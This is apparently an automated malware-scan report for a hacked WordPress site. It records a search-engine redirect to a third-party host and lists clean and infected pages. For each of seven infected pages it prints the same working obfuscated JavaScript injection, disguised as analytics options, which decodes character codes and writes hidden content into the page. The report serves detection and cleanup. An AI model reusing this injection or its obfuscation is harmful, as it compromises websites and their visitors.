New scan:

Malware Scanner report for transformation-center-beta.org

Malicious/Suspicious/Total urls checked
7/0/16
7 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://ibontu.25u.com/
9770 websites infected.

The website "transformation-center-beta.org" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://transformation-center-beta.org/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: transformation-center-beta.org
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 04 Sep 2014 08:38:22 GMT
Location: http://ibontu.25u.com/
Server: Apache
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://transformation-center-beta.org/
200 OK
Content-Length: 26118
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://transformation-center-beta.org/wp-content/plugins/wp-imageflow2/js/imageflowplus.js?ver=3.5.1
200 OK
Content-Length: 27459
Content-Type: application/javascript
clean
http://transformation-center-beta.org/wp-content/themes/thetransformationcenter/js/comment-reply.js?ver=3.5.1
200 OK
Content-Length: 909
Content-Type: application/javascript
clean
http://transformation-center-beta.org/wp-content/plugins/slide-in/js/wdsi.js?ver=1.1.3
200 OK
Content-Length: 12152
Content-Type: application/javascript
clean
http://transformation-center-beta.org/wp-content/themes/thetransformationcenter/js/jquery.main.js
200 OK
Content-Length: 46164
Content-Type: application/javascript
clean
http://transformation-center-beta.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/
404 Not Found
Content-Length: 11640
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/about/
200 OK
Content-Length: 16684
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/contact/
200 OK
Content-Length: 17536
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/wp-content/plugins/easy-contact-forms/easy-contact-forms-forms.1.3.1.js?ver=3.5.1
200 OK
Content-Length: 19714
Content-Type: application/javascript
clean
http://transformation-center-beta.org/donate/
200 OK
Content-Length: 13810
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/?feed=rss2
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 04 Sep 2014 08:38:32 GMT
ETag: "0ceb3b013543d1312e748476a2725e75"
Location: http://transformation-center-beta.org/feed/
Server: Apache
Content-Length: 0
Content-Type: text/html
Last-Modified: Thu, 13 Jun 2013 03:09:51 GMT
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=transformation-center-beta.org
Set-Cookie: wdsi-on_hided41d8cd98f00b204e9800998ecf8427e=deleted; expires=Wed, 04-Sep-2013 08:38:32 GMT; path=/
X-Pingback: http://transformation-center-beta.org/xmlrpc.php
clean
http://transformation-center-beta.org/feed/
200 OK
Content-Length: 17897
Content-Type: text/xml
clean
http://transformation-center-beta.org/wp-content/uploads/2012/10/vfc-Summer-2012.pdf
200 OK
Content-Length: 300869
Content-Type: application/pdf
clean
http://transformation-center-beta.org/test404page.js
404 Not Found
Content-Length: 11640
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

http://transformation-center-beta.org/home/community/
200 OK
Content-Length: 14852
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618917116818517518617116517619318218118']);
_ga4.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']);
_ga4.push(['_setOption', '1821281841711691861101221201211821901141671871861811141']);
_ga4.push(['_setOption', '6718718618111412212012118219011112919513011718518619117']);
_ga4.push(['_setOption', '8171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Avast
HTML:HideMe-F [Trj]

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=transformation-center-beta.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://transformation-center-beta.org/

Result: transformation-center-beta.org is not infected or malware details are not published yet.